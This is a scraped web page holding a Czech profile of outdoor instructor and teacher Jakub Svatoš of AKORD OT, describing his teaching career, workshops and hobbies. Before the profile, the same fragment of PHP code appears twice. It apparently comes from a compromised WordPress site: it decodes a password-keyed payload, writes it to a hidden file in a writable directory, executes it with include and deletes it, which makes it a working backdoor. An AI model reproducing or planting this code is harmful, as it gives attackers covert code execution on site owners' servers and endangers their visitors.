100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Jakub Svatoš - AKORD OT

je outdoorovým instruktorem a konzultantem pro oblast spolupráce s pedagogy a školami

  • je zkušeným instruktorem outdoorových programů, kterým se v AKORDu věnuje již od roku 2005, působí také jako konzultant programů pro pedagogy či školy
  • v současné době působí jako třídní učitel třetí třídy na přední pražské fakultní základní škole
  • externě vyučuje na UJEP předmět Facilitační dovednosti a skupinová dynamika
  • jako facilitátor působil během setkání zaměřených např. na individualizaci ve výuce, poskytování zpětné vazby nebo využívání zážitkové pedagogiky ve výuce
  • vedl workshopy pro pedagogy se zaměřením na Interaktivní metody ve výuce mluvnice na prvním stupni ZŠ, je držitelem certifikátu základního kurzu vzdělávacího programu Čtením a psaním ke kritickému myšlení (RWCT)
  • v posledních dvou letech absolvoval semináře pro pedagogy, např. Prevence patologických jevů v třídním kolektivu, Zavedení metod kritického myšlení do praxe, Důkazy učení žáků, Individulizace ve výuce a mnohé další
  • má také mnohaleté zkušenosti s pořádáním programů pro děti, jak pobytových, tak různých dílen a wokrshopů, od roku 2002 tráví každé léto na dětském táboře, nejprve jako oddílový vedoucí věkové skupiny 13 -16 let, od roku 2014 působí v pozici hlavního vedoucího
  • je bývalým plavcem a reprezentantem vodního póla, v současnosti je jeho největší zálibou florbal, jízda na kole a hudební produkce